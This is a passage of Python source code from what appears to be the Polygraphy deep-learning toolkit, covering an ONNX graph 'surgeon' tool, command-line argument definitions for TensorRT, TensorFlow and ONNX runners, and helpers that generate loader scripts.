if not args.no_toposort:
graph.toposort()
onnx_model = gs.export_onnx(graph)
G_LOGGER.info("Writing model to: {output}. To see more details about the model, use: polygraphy inspect model {output} --mode=basic".format(output=args.output))
onnx.save(onnx_model, args.output)
class STPrepare(STSurgeonBase):
"""
[EXPERIMENTAL] Prepare a JSON configuration file for a given model,
which can be edited and provided to `operate`.
"""
def __init__(self):
self.name = "prepare"
def add_parser_args(self, parser):
parser.add_argument("-o", "--output", help="Path to save JSON configuration for the model. "
"If omitted, the JSON configuration is printed to standard output.")
super().add_parser_args(parser)
def __call__(self, args):
graph = super().setup(args)
config = Config.from_graph(graph)
config_json = json.dumps(config, indent=constants.TAB)
G_LOGGER.info("Please do NOT modify the node 'id' values in the configuration file, or things may not work!")
if args.output:
with open(args.output, "w") as f:
f.write(config_json)
else:
print(config_json)
class STOperate(STSurgeonBase):
"""
[EXPERIMENTAL] Modify a model according to the provided JSON configuration file.
"""
def __init__(self):
self.name = "operate"
def add_parser_args(self, parser):
parser.add_argument("-c", "--config", required=True, help="Path to JSON configuration that specifies how the model should be modified.")
parser.add_argument("-o", "--output", required=True, help="Path to save the model")
super().add_parser_args(parser, gs=True)
def __call__(self, args):
graph = super().setup(args)
with open(args.config, "r") as f:
config = json.loads(f.read())
G_LOGGER.info("Please ensure you have not modified the node 'id' values in the configuration file, or things may not work!")
tensor_map = graph.tensors()
def get_tensor(name):
if name not in tensor_map:
G_LOGGER.verbose("Tensor: {:} does not exist in the model. Creating a new tensor".format(name))
tensor_map[name] = gs.Variable(name)
return tensor_map[name]
def tensors_from_names(names):
tensors = []
for name in names:
tensors.append(get_tensor(name))
return tensors
def tensors_from_meta(meta, shape_optional=False):
tensors = []
for tensor_meta in meta:
tensor = get_tensor(tensor_meta["name"])
if "shape" in tensor_meta:
tensor.shape = tensor_meta["shape"]
elif not shape_optional:
G_LOGGER.critical("Could not find shape information for tensor: {:}".format(tensor.name))
if "dtype" in tensor_meta:
tensor.dtype = misc.NP_TYPE_FROM_STR[tensor_meta["dtype"]]
tensors.append(tensor)
return tensors
graph.inputs = tensors_from_meta(config["graph_inputs"])
for inp in graph.inputs:
# Need to disconnect inputs of graph inputs, or nodes prior to them will remain
inp.inputs.clear()
graph.outputs = tensors_from_meta(config["graph_outputs"], shape_optional=True)
nodes = []
for node_info in config["nodes"]:
if node_info["id"] > len(graph.nodes):
G_LOGGER.critical("Could not find node with ID: {:}. Were the node IDs modified in the config file?".format(node_info["id"]))
node = graph.nodes[node_info["id"]]
node.name = node_info["name"]
node.op = node_info["op"]
node.inputs = tensors_from_names(node_info["inputs"])
node.outputs = tensors_from_names(node_info["outputs"])
nodes.append(node)
graph.nodes = nodes
if not args.no_cleanup:
graph.cleanup()
if not args.no_toposort:
graph.toposort()
onnx.save(gs.export_onnx(graph), args.output)
################################# MAIN TOOL #################################
class Surgeon(Tool):
"""
Modify models.
"""
def __init__(self):
self.name = "surgeon"
def add_parser_args(self, parser):
subparsers = parser.add_subparsers(title="Surgical Instruments", dest="instrument")
subparsers.required = True
SURGEON_SUBTOOLS = [
STExtract(),
STPrepare(),
STOperate(),
]
for subtool in SURGEON_SUBTOOLS:
subtool.setup_parser(subparsers)
def __call__(self, args):
pass
```
#### File: tools/util/args.py
```python
import argparse
import copy
import os
from polygraphy.common import TensorMetadata, constants
from polygraphy.logger.logger import G_LOGGER, LogMode
from polygraphy.util import misc
# The functions in this file include flags to control the set of options that are generated.
def add_model_args(parser, model_required=False, inputs="--inputs"):
model_args = parser.add_argument_group("Model", "Model Options")
model_args.add_argument("model_file", help="Path to the model", nargs=None if model_required else '?')
model_args.add_argument("--model-type", help="The type of the input model: {{'frozen': TensorFlow frozen graph, 'keras': Keras model, "
"'ckpt': TensorFlow checkpoint directory, 'onnx': ONNX model, 'engine': TensorRT engine, 'uff': UFF file [deprecated], "
"'caffe': Caffe prototxt [deprecated]}}", choices=["frozen", "keras", "ckpt", "onnx", "uff", "caffe", "engine"],
default=None)
if inputs:
model_args.add_argument(inputs, inputs.replace("inputs", "input") + "-shapes", help="Model input(s) and their shape(s). Format: {arg_name} <name>,<shape>. "
"For example: {arg_name} image:1,1x3x224x224 other_input,10".format(arg_name=inputs), nargs="+", default=None, dest="inputs")
def add_dataloader_args(parser):
data_loader_args = parser.add_argument_group("Data Loader", "Options for modifying data used for inference")
data_loader_args.add_argument("--seed", metavar="SEED", help="Seed to use for random inputs",
type=int, default=None)
data_loader_args.add_argument("--int-min", help="Minimum integer value for random integer inputs", type=int, default=None)
data_loader_args.add_argument("--int-max", help="Maximum integer value for random integer inputs", type=int, default=None)
data_loader_args.add_argument("--float-min", help="Minimum float value for random float inputs", type=float, default=None)
data_loader_args.add_argument("--float-max", help="Maximum float value for random float inputs", type=float, default=None)
def add_comparator_args(parser, iters=True, accuracy=True, validate=True, read=True, write=True, fail_fast=True, subprocess=True, top_k=False):
comparator_args = parser.add_argument_group("Comparator", "Options for changing result comparison behavior")
if iters:
comparator_args.add_argument("--warm-up", metavar="NUM", help="Number of warm-up runs before timing inference", type=int, default=None)
comparator_args.add_argument("--iterations", metavar="NUM", help="Number of inference iterations", type=int, default=None)
if accuracy:
comparator_args.add_argument("--no-shape-check", help="Disable checking that output shapes match exactly", action="store_true", default=None)
comparator_args.add_argument("--rtol", metavar="RTOL", help="Relative tolerance for output comparison. See "
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html for details", type=float, default=None)
comparator_args.add_argument("--atol", metavar="ATOL", help="Absolute tolerance for output comparison. See "
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html for details", type=float, default=None)
if validate:
comparator_args.add_argument("--validate", help="Check outputs for NaNs", action="store_true", default=None)
if read:
comparator_args.add_argument("--load-results", help="Path(s) to load results from runners.", nargs="+", default=[])
if write:
comparator_args.add_argument("--save-results", help="Path to save results from runners.", default=None)
if fail_fast:
comparator_args.add_argument("--fail-fast", help="Fail fast (stop comparing after the first failure)", action="store_true", default=None)
if subprocess:
comparator_args.add_argument("--use-subprocess", help="Run runners in isolated subprocesses. Cannot be used with a debugger",
action="store_true", default=None)
if top_k:
comparator_args.add_argument("--top-k", help="[EXPERIMENTAL] Apply Top-K (i.e. find indices of K largest values) to the outputs before comparing them.", type=int, default=None)
return comparator_args
def add_runner_args(parser):
# Appends to args.runners
class StoreRunnerOrdered(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not hasattr(namespace, "runners"):
namespace.runners = []
namespace.runners.append(option_string.lstrip("-").replace("-", "_"))
runner_args = parser.add_argument_group("Runners", "Options for selecting runners. Zero or more runners may be specified")
runner_args.add_argument("--trt", help="Run inference using TensorRT", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--trt-legacy", help="Run inference using Legacy TensorRT Runner. Only supports networks using implicit batch mode",
action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--tf", help="Run inference using TensorFlow", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--onnxrt", help="Run inference using ONNX Runtime", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--onnxtf", help="Run inference using the ONNX-TensorFlow Backend", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--cntk", help="[EXPERIMENTAL] Run inference on a CNTK model using CNTK", action=StoreRunnerOrdered, nargs=0)
def add_trt_args(parser, write=True, config=True, outputs=True, network_api=False):
trt_args = parser.add_argument_group("TensorRT", "Options for TensorRT")
if write:
trt_args.add_argument("--save-engine", help="Path to save a TensorRT engine file", default=None)
if config:
trt_args.add_argument("--trt-min-shapes", action='append', help="The minimum shapes the optimization profile(s) will support. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-min-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--trt-opt-shapes", action='append', help="The shapes for which the optimization profile(s) will be most performant. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-opt-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--trt-max-shapes", action='append', help="The maximum shapes the optimization profile(s) will support. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-max-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--tf32", help="Enable tf32 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--fp16", help="Enable fp16 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--int8", help="Enable int8 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--strict-types", help="Enable strict types in TensorRT, forcing it to choose tactics based on the "
"layer precision set, even if another precision is faster.", action="store_true", default=None)
# Workspace uses float to enable scientific notation (e.g. 1e9)
trt_args.add_argument("--workspace", metavar="BYTES", help="Memory in bytes to allocate for the TensorRT builder's workspace", type=float, default=None)
trt_args.add_argument("--calibration-cache", help="Path to the calibration cache", default=None)
trt_args.add_argument("--plugins", help="Path(s) of additional plugin libraries to load", nargs="+", default=None)
trt_args.add_argument("--explicit-precision", help="Enable explicit precision mode", action="store_true", default=None)
trt_args.add_argument("--ext", help="Enable parsing ONNX models with externally stored weights", action="store_true", default=None)
if outputs:
trt_args.add_argument("--trt-outputs", help="Name(s) of TensorRT output(s). "
"Using '--trt-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
trt_args.add_argument("--trt-exclude-outputs", help="[EXPERIMENTAL] Name(s) of TensorRT output(s) to unmark as outputs. ",
nargs="+", default=None)
if network_api:
trt_args.add_argument("--network-api", help="[EXPERIMENTAL] Generated script will include placeholder code for defining a TensorRT Network using "
"the network API. Only valid if --gen/--gen-script is also enabled.", action="store_true", default=None)
def add_trt_legacy_args(parser):
trt_legacy_args = parser.add_argument_group("TensorRT Legacy", "[DEPRECATED] Options for TensorRT Legacy. Reuses TensorRT options, but does not support int8 mode, or dynamic shapes")
trt_legacy_args.add_argument("-p", "--preprocessor", help="The preprocessor to use for the UFF converter", default=None)
trt_legacy_args.add_argument("--uff-order", help="The order of the input", default=None)
trt_legacy_args.add_argument("--batch-size", metavar="SIZE", help="The batch size to use in TensorRT when it cannot be automatically determined", type=int, default=None)
trt_legacy_args.add_argument("--model", help="Model file for Caffe models. The deploy file should be provided as the model_file positional argument", dest="caffe_model")
trt_legacy_args.add_argument("--save-uff", help="Save intermediate UFF files", action="store_true", default=None)
def add_tf_args(parser, tftrt=True, artifacts=True, runtime=True, outputs=True):
tf_args = parser.add_argument_group("TensorFlow", "Options for TensorFlow")
tf_args.add_argument("--ckpt", help="[EXPERIMENTAL] Name of the checkpoint to load. Required if the `checkpoint` file is missing. Should not include file extension "
"(e.g. to load `model.meta` use `--ckpt=model`)", default=None)
if outputs:
tf_args.add_argument("--tf-outputs", help="Name(s) of TensorFlow output(s). "
"Using '--tf-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
if artifacts:
tf_args.add_argument("--save-pb", help="Path to save the TensorFlow frozen graphdef", default=None)
tf_args.add_argument("--save-tensorboard", help="[EXPERIMENTAL] Path to save a TensorBoard visualization", default=None)
tf_args.add_argument("--save-timeline", help="[EXPERIMENTAL] Directory to save timeline JSON files for profiling inference (view at chrome://tracing)", default=None)
if runtime:
tf_args.add_argument("--gpu-memory-fraction", help="Maximum percentage of GPU memory TensorFlow can allocate per process", type=float, default=None)
tf_args.add_argument("--allow-growth", help="Allow GPU memory allocated by TensorFlow to grow", action="store_true", default=None)
tf_args.add_argument("--xla", help="[EXPERIMENTAL] Attempt to run graph with xla", action="store_true", default=None)
tf_args.add_argument("--freeze-graph", help="[EXPERIMENTAL] Attempt to freeze the graph", action="store_true", default=None)
if tftrt:
tftrt_args = parser.add_argument_group("TensorFlow-TensorRT", "[UNTESTED] Options for TensorFlow-TensorRT Integration")
tftrt_args.add_argument("--tftrt", help="[UNTESTED] Enable TF-TRT integration", action="store_true", default=None)
tftrt_args.add_argument("--minimum-segment-size", help="Minimum length of a segment to convert to TensorRT", type=int, default=None)
tftrt_args.add_argument("--dynamic-op", help="Enable dynamic mode (defers engine build until runtime)", action="store_true", default=None)
def add_onnx_args(parser, write=True, outputs=True, shape_inference_default=None):
onnx_args = parser.add_argument_group("ONNX Options", "Options for ONNX")
if write:
onnx_args.add_argument("--save-onnx", help="Path to save the ONNX model", default=None)
if shape_inference_default:
onnx_args.add_argument("--no-shape-inference", help="Disable ONNX shape inference when loading the model", action="store_true", default=None)
else:
onnx_args.add_argument("--shape-inference", help="Enable ONNX shape inference when loading the model", action="store_true", default=None)
if outputs:
onnx_args.add_argument("--onnx-outputs", help="Name(s) of ONNX output(s). "
"Using '--onnx-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
onnx_args.add_argument("--onnx-exclude-outputs", help="[EXPERIMENTAL] Name(s) of ONNX output(s) to unmark as outputs.", nargs="+", default=None)
def add_tf_onnx_args(parser):
tf_onnx_args = parser.add_argument_group("TensorFlow-ONNX Options", "Options for TensorFlow-ONNX conversion")
tf_onnx_args.add_argument("--opset", help="Opset to use when converting to ONNX", default=None, type=int)
tf_onnx_args.add_argument("--no-const-folding", help="Do not fold constants in the TensorFlow graph prior to conversion", action="store_true", default=None)
def add_logger_args(parser):
logging_args = parser.add_argument_group("Logging", "Options for logging and debug output")
logging_args.add_argument("-v", "--verbose", help="Increase logging verbosity. Specify multiple times for higher verbosity", action="count", default=0)
logging_args.add_argument("--silent", help="Disable all output", action="store_true", default=None)
logging_args.add_argument("--log-format", help="Format for log messages: {{'timestamp': Include timestamp, 'line-info': Include file and line number, "
"'no-colors': Disable colors}}", choices=["timestamp", "line-info", "no-colors"], nargs="+", default=[])
def get(args, attr):
"""
Gets a command-line argument if it exists, otherwise returns None.
Args:
args: The command-line arguments.
attr (str): The name of the command-line argument.
"""
if hasattr(args, attr):
return getattr(args, attr)
return None
def parse_meta(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>,<shape>,<dtype>"
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
SEP = ","
SHAPE_SEP = "x"
meta = TensorMetadata()
for orig_tensor_meta_arg in meta_args:
tensor_meta_arg = orig_tensor_meta_arg
def pop_meta(name):
nonlocal tensor_meta_arg
tensor_meta_arg, _, val = tensor_meta_arg.rpartition(SEP)
if not tensor_meta_arg:
G_LOGGER.critical("Could not parse {:} from argument: {:}. Is it separated by a comma "
"(,) from the tensor name?".format(name, orig_tensor_meta_arg))
if val.lower() == "auto":
val = None
return val
def parse_dtype(dtype):
if dtype is not None:
if dtype not in misc.NP_TYPE_FROM_STR:
G_LOGGER.critical("Could not understand data type: {:}. Please use one of: {:} or `auto`"
.format(dtype, list(misc.NP_TYPE_FROM_STR.keys())))
dtype = misc.NP_TYPE_FROM_STR[dtype]
return dtype
def parse_shape(shape):
if shape is not None:
def parse_shape_dim(buf):
try:
buf = int(buf)
except:
pass
return buf
parsed_shape = []
# Allow for quoted strings in shape dimensions
in_quotes = False
buf = ""
for char in shape.lower():
if char in ["\"", "'"]:
in_quotes = not in_quotes
elif not in_quotes and char == SHAPE_SEP:
parsed_shape.append(parse_shape_dim(buf))
buf = ""
else:
buf += char
# For the last dimension
parsed_shape.append(parse_shape_dim(buf))
shape = tuple(parsed_shape)
return shape
name = None
dtype = None
shape = None
if includes_dtype:
dtype = parse_dtype(pop_meta("data type"))
if includes_shape:
shape = parse_shape(pop_meta("shape"))
name = tensor_meta_arg
meta.add(name, dtype, shape)
return meta
# shapes is a TensorMetadata describing the runtime input shapes.
# Returns (List[Tuple[OrderedDict[str, List[int]]])
def parse_profile_shapes(shapes, min_args, opt_args, max_args):
def get_shapes(lst, idx):
default_shapes = copy.copy(shapes)
if idx < len(lst):
default_shapes.update(parse_meta(lst[idx], includes_dtype=False))
# Don't care about dtype, and need to override dynamic dimensions
default_shapes = {name: misc.override_dynamic_shape(shape) for name, (_, shape) in default_shapes.items()}
for name, (_, shape) in shapes.items():
if tuple(default_shapes[name]) != tuple(shape):
G_LOGGER.warning("Input tensor: {:} | For TensorRT profile, overriding shape: {:} to: {:}".format(name, shape, default_shapes[name]), mode=LogMode.ONCE)
return default_shapes
num_profiles = max(len(min_args), len(opt_args), len(max_args))
# For cases where input shapes are provided, we have to generate a profile
if not num_profiles and shapes:
num_profiles = 1
profiles = []
for idx in range(num_profiles):
min_shapes = get_shapes(min_args, idx)
opt_shapes = get_shapes(opt_args, idx)
max_shapes = get_shapes(max_args, idx)
if sorted(min_shapes.keys()) != sorted(opt_shapes.keys()):
G_LOGGER.critical("Mismatch in input names between minimum shapes ({:}) and optimum shapes "
"({:})".format(list(min_shapes.keys()), list(opt_shapes.keys())))
elif sorted(opt_shapes.keys()) != sorted(max_shapes.keys()):
G_LOGGER.critical("Mismatch in input names between optimum shapes ({:}) and maximum shapes "
"({:})".format(list(opt_shapes.keys()), list(max_shapes.keys())))
profiles.append((min_shapes, opt_shapes, max_shapes))
return profiles
def setup_logger(args):
if args.verbose >= 4:
G_LOGGER.severity = G_LOGGER.ULTRA_VERBOSE
elif args.verbose == 3:
G_LOGGER.severity = G_LOGGER.SUPER_VERBOSE
elif args.verbose == 2:
G_LOGGER.severity = G_LOGGER.EXTRA_VERBOSE
elif args.verbose == 1:
G_LOGGER.severity = G_LOGGER.VERBOSE
if args.silent:
G_LOGGER.severity = G_LOGGER.CRITICAL
for fmt in args.log_format:
if fmt == "no-colors":
G_LOGGER.colors = False
elif fmt == "timestamp":
G_LOGGER.timestamp = True
elif fmt == "line-info":
G_LOGGER.line_info = True
def determine_model_type(args):
if get(args, "model_type") is not None:
return args.model_type.lower()
if get(args, "model_file") is None:
return None
def use_ext(ext_mapping):
file_ext = os.path.splitext(args.model_file)[-1]
if file_ext in ext_mapping:
return ext_mapping[file_ext]
if get(args, "ckpt") or os.path.isdir(args.model_file):
return "ckpt"
elif "tf" in args.runners or "trt_legacy" in args.runners:
if args.caffe_model:
return "caffe"
ext_mapping = {".hdf5": "keras", ".uff": "uff", ".prototxt": "caffe", ".onnx": "onnx", ".engine": "engine", ".plan": "engine"}
return use_ext(ext_mapping) or "frozen"
else:
# When no framework is provided, some extensions can be ambiguous
ext_mapping = {".hdf5": "keras", ".graphdef": "frozen", ".onnx": "onnx", ".uff": "uff", ".engine": "engine", ".plan": "engine"}
model_type = use_ext(ext_mapping)
if model_type:
return model_type
G_LOGGER.critical("Could not automatically determine model type for: {:}\n"
"Please explicitly specify the type with the --model-type option".format(
args.model_file))
def setup(args, unknown):
"""
Prepares argument values for use.
"""
def exist(names):
return all([hasattr(args, name) for name in names])
def process_output_arg(name):
arg = get(args, name)
if arg is not None and len(arg) == 2 and arg == ["mark", "all"]:
arg = constants.MARK_ALL
setattr(args, name, arg)
if unknown:
G_LOGGER.critical("Unrecognized Options: {:}".format(unknown))
setup_logger(args)
if not exist(["runners"]): # For when no runners are specified
args.runners = []
if get(args, "network_api") and not get(args, "gen_script"):
G_LOGGER.critical("Cannot use the --network-api option if --gen/--gen-script is not being used.")
elif get(args, "network_api") and "trt" not in args.runners:
args.runners.append("trt")
if get(args, "model_file"):
G_LOGGER.verbose("Model: {:}".format(args.model_file))
if not os.path.exists(args.model_file):
G_LOGGER.warning("Model path does not exist: {:}".format(args.model_file))
args.model_file = os.path.abspath(args.model_file)
elif args.runners and get(args, "network_api") is None:
G_LOGGER.critical("One or more runners was specified, but no model file was provided. Make sure you've specified the model path, "
"and also that it's not being consumed as an argument for another parameter")
args.model_type = determine_model_type(args)
if get(args, "inputs"):
args.inputs = parse_meta(args.inputs, includes_dtype=False) # TensorMetadata
else:
args.inputs = TensorMetadata()
if exist(["trt_min_shapes", "trt_opt_shapes", "trt_max_shapes"]):
args.profiles = parse_profile_shapes(args.inputs, args.trt_min_shapes, args.trt_opt_shapes, args.trt_max_shapes)
elif args.inputs:
args.profiles = parse_profile_shapes(args.inputs, [], [], [])
if exist(["workspace"]):
args.workspace = int(args.workspace) if args.workspace is not None else args.workspace
process_output_arg("tf_outputs")
process_output_arg("trt_outputs")
process_output_arg("onnx_outputs")
return args
```
#### File: tools/util/misc.py
```python
from polygraphy.tools.util.script import Script, Inline
from polygraphy.tools.util import args as args_util
from polygraphy.logger import G_LOGGER, LogMode
from polygraphy.common import constants
from polygraphy.util import misc
import os
################################# SCRIPT HELPERS #################################
def add_logger_settings(script, args):
# Always required since it is used to print the exit message.
script.append_preimport("from polygraphy.logger import G_LOGGER")
logger_settings = []
verbosity_count = args_util.get(args, "verbose")
if verbosity_count >= 4:
logger_settings.append("G_LOGGER.severity = G_LOGGER.ULTRA_VERBOSE")
elif verbosity_count == 3:
logger_settings.append("G_LOGGER.severity = G_LOGGER.SUPER_VERBOSE")
elif verbosity_count == 2:
logger_settings.append("G_LOGGER.severity = G_LOGGER.EXTRA_VERBOSE")
elif verbosity_count == 1:
logger_settings.append("G_LOGGER.severity = G_LOGGER.VERBOSE")
if args_util.get(args, "silent"):
logger_settings.append("G_LOGGER.severity = G_LOGGER.CRITICAL")
log_format = misc.default_value(args_util.get(args, "log_format"), [])
for fmt in args.log_format:
if fmt == "no-colors":
logger_settings.append("G_LOGGER.colors = False")
elif fmt == "timestamp":
logger_settings.append("G_LOGGER.timestamp = True")
elif fmt == "line-info":
logger_settings.append("G_LOGGER.line_info = True")
for setting in logger_settings:
script.append_preimport(setting)
def _get_outputs_arg(script, args, name):
outputs = args_util.get(args, name)
if outputs == constants.MARK_ALL:
outputs = Inline("constants.MARK_ALL")
script.add_import(["constants"], frm="polygraphy.common")
return outputs
def add_tf_loader(script, args, disable_outputs=None, suffix=None):
if disable_outputs:
outputs = None
else:
outputs = _get_outputs_arg(script, args, "tf_outputs")
model_file = args_util.get(args, "model_file")
model_type = args_util.get(args, "model_type")
save_pb = args_util.get(args, "save_pb")
save_tensorboard = args_util.get(args, "save_tensorboard")
if model_type == "ckpt":
G_LOGGER.verbose("Loading a TensorFlow checkpoint. Please ensure you are not using the --use-subprocess flag".format(model_file), mode=LogMode.ONCE)
script.add_import(imports=["GraphFromCkpt"], frm="polygraphy.backend.tf")
loader_id = "load_ckpt"
loader_str = Script.invoke("GraphFromCkpt", model_file, args_util.get(args, "ckpt"))
elif model_type == "keras":
script.add_import(imports=["GraphFromKeras"], frm="polygraphy.backend.tf")
loader_id = "load_keras"
loader_str = Script.invoke("GraphFromKeras", model_file)
else:
script.add_import(imports=["GraphFromFrozen"], frm="polygraphy.backend.tf")
G_LOGGER.verbose("Attempting to load as a frozen graph. If this is not correct, please specify --model-type", mode=LogMode.ONCE)
loader_id = "load_frozen"
loader_str = Script.invoke("GraphFromFrozen", model_file)
loader_name = script.add_loader(loader_str, loader_id, suffix=suffix)
if args_util.get(args, "freeze_graph"):
script.add_import(imports=["OptimizeGraph"], frm="polygraphy.backend.tf")
loader_name = script.add_loader(Script.invoke("OptimizeGraph", loader_name), "optimize_graph", suffix=suffix)
if args_util.get(args, "tftrt"):
script.add_import(imports=["UseTfTrt"], frm="polygraphy.backend.tf")
loader_str = Script.invoke("UseTfTrt", loader_name, max_workspace_size=args_util.get(args, "workspace"), fp16=args_util.get(args, "fp16"), int8=args_util.get(args, "int8"),
max_batch_size=args_util.get(args, "batch_size"), is_dynamic_op=args_util.get(args, "dynamic_op"), minimum_segment_size=args_util.get(args, "minimum_segment_size"))
loader_name = script.add_loader(loader_str, "use_tftrt", suffix=suffix)
MODIFY_TF = "ModifyGraph"
modify_tf_str = Script.invoke(MODIFY_TF, loader_name, outputs=outputs)
if modify_tf_str != Script.invoke(MODIFY_TF, loader_name):
script.add_import(imports=[MODIFY_TF], frm="polygraphy.backend.tf")
loader_name = script.add_loader(modify_tf_str, "modify_tf")
engine_dir = None
if args_util.get(args, "tftrt"):
engine_dir = args_util.get(args, "save_engine")
WRITE_TF = "SaveGraph"
write_tf_str = Script.invoke(WRITE_TF, loader_name, path=save_pb, tensorboard_dir=save_tensorboard, engine_dir=engine_dir)
if write_tf_str != Script.invoke(WRITE_TF, loader_name):
script.add_import(imports=[WRITE_TF], frm="polygraphy.backend.tf")
loader_name = script.add_loader(write_tf_str, "save_tf")
return loader_name
def add_tf_config_loader(script, args):
config_loader_str = Script.invoke_if_nondefault("CreateConfig", gpu_memory_fraction=args_util.get(args, "gpu_memory_fraction"),
allow_growth=args_util.get(args, "allow_growth"), use_xla=args_util.get(args, "xla"))
if config_loader_str is not None:
script.add_import(imports=["CreateConfig"], frm="polygraphy.backend.tf")
config_loader_name = script.add_loader(config_loader_str, "create_tf_config")
else:
config_loader_name = None
return config_loader_name
def get_modify_onnx_str(script, args, loader_name, disable_outputs=None):
if disable_outputs:
outputs = None
exclude_outputs = None
else:
outputs = _get_outputs_arg(script, args, "onnx_outputs")
exclude_outputs = args_util.get(args, "onnx_exclude_outputs")
if hasattr(args, "shape_inference"):
do_shape_inference = args_util.get(args, "shape_inference")
else:
do_shape_inference = None if args_util.get(args, "no_shape_inference") else True
MODIFY_ONNX = "ModifyOnnx"
modify_onnx_str = Script.invoke(MODIFY_ONNX, loader_name, do_shape_inference=do_shape_inference,
outputs=outputs, exclude_outputs=exclude_outputs)
if modify_onnx_str != Script.invoke(MODIFY_ONNX, loader_name):
script.add_import(imports=[MODIFY_ONNX], frm="polygraphy.backend.onnx")
return modify_onnx_str
return None
def add_onnx_loader(script, args, disable_outputs=None, suffix=None):
if args_util.get(args, "model_type") == "onnx":
script.add_import(imports=["OnnxFromPath"], frm="polygraphy.backend.onnx")
loader_str = Script.invoke("OnnxFromPath", args_util.get(args, "model_file"))
loader_name = script.add_loader(loader_str, "load_onnx", suffix=suffix)
else:
G_LOGGER.verbose("Attempting to load as a TensorFlow model, using TF2ONNX to convert to ONNX. "
"If this is not correct, please specify --model-type", mode=LogMode.ONCE)
script.add_import(imports=["OnnxFromTfGraph"], frm="polygraphy.backend.onnx")
loader_str = Script.invoke("OnnxFromTfGraph", add_tf_loader(script, args, disable_outputs=True, suffix=suffix),
opset=args_util.get(args, "opset"), fold_constant=False if args_util.get(args, "no_const_folding") else None)
loader_name = script.add_loader(loader_str, "export_onnx_from_tf", suffix=suffix)
modify_onnx_str = get_modify_onnx_str(script, args, loader_name, disable_outputs=disable_outputs)
if modify_onnx_str is not None:
loader_name = script.add_loader(modify_onnx_str, "modify_onnx")
save_onnx = args_util.get(args, "save_onnx")
SAVE_ONNX = "SaveOnnx"
save_onnx_str = Script.invoke(SAVE_ONNX, loader_name, path=save_onnx)
if save_onnx_str != Script.invoke(SAVE_ONNX, loader_name):
script.add_import(imports=[SAVE_ONNX], frm="polygraphy.backend.onnx")
loader_name = script.add_loader(save_onnx_str, "save_onnx")
return loader_name
def add_serialized_onnx_loader(script, args, disable_outputs=None):
model_file = args_util.get(args, "model_file")
needs_modify = get_modify_onnx_str(script, args, "check_needs_modify", disable_outputs) is not None
should_import_raw = args_util.get(args, "model_type") == "onnx" and not needs_modify
if should_import_raw:
script.add_import(imports=["BytesFromPath"], frm="polygraphy.backend.common")
onnx_loader = script.add_loader(Script.invoke("BytesFromPath", model_file), "load_serialized_onnx")
else:
script.add_import(imports=["BytesFromOnnx"], frm="polygraphy.backend.onnx")
onnx_loader = add_onnx_loader(script, args, disable_outputs=disable_outputs)
onnx_loader = script.add_loader(Script.invoke("BytesFromOnnx", onnx_loader), "serialize_onnx")
return onnx_loader
# If plugins are present, wrap the provided loader/object with LoadPlugins
def _wrap_if_plugins(script, args, obj_name):
plugins = args_util.get(args, "plugins")
if plugins:
script.add_import(imports=["LoadPlugins"], frm="polygraphy.backend.trt")
loader_str = Script.invoke("LoadPlugins", obj_name, plugins=plugins)
obj_name = script.add_loader(loader_str, "load_plugins")
return obj_name
def add_trt_network_loader(script, args):
model_file = args_util.get(args, "model_file")
outputs = _get_outputs_arg(script, args, "trt_outputs")
if args_util.get(args, "network_api"):
CREATE_NETWORK_FUNC = Inline("create_network")
script.add_import(imports=["CreateNetwork"], frm="polygraphy.backend.trt")
script.add_import(imports=["extend"], frm="polygraphy.common.func")
script.append_prefix("# Manual TensorRT network creation")
script.append_prefix("@extend(CreateNetwork())")
script.append_prefix("def {:}(builder, network):".format(CREATE_NETWORK_FUNC))
script.append_prefix("{tab}import tensorrt as trt\n".format(tab=constants.TAB))
script.append_prefix("{tab}# Define your network here. Make sure to mark outputs!".format(tab=constants.TAB))
net_inputs = args_util.get(args, "inputs")
if net_inputs:
for name, (dtype, shape) in net_inputs.items():
script.append_prefix("{tab}{name} = network.add_input(name='{name}', shape={shape}, dtype=trt.float32) # TODO: Set dtype".format(
name=name, shape=shape, tab=constants.TAB))
script.append_prefix("{tab}# TODO: network.mark_output(...)\n".format(tab=constants.TAB))
return CREATE_NETWORK_FUNC
if args_util.get(args, "ext"):
script.add_import(imports=["NetworkFromOnnxPath"], frm="polygraphy.backend.trt")
loader_str = Script.invoke("NetworkFromOnnxPath", _wrap_if_plugins(script, args, model_file), explicit_precision=args_util.get(args, "explicit_precision"))
loader_name = script.add_loader(loader_str, "parse_network_from_onnx")
else:
script.add_import(imports=["NetworkFromOnnxBytes"], frm="polygraphy.backend.trt")
onnx_loader = add_serialized_onnx_loader(script, args, disable_outputs=True)
loader_str = Script.invoke("NetworkFromOnnxBytes", _wrap_if_plugins(script, args, onnx_loader), explicit_precision=args_util.get(args, "explicit_precision"))
loader_name = script.add_loader(loader_str, "parse_network_from_onnx")
MODIFY_NETWORK = "ModifyNetwork"
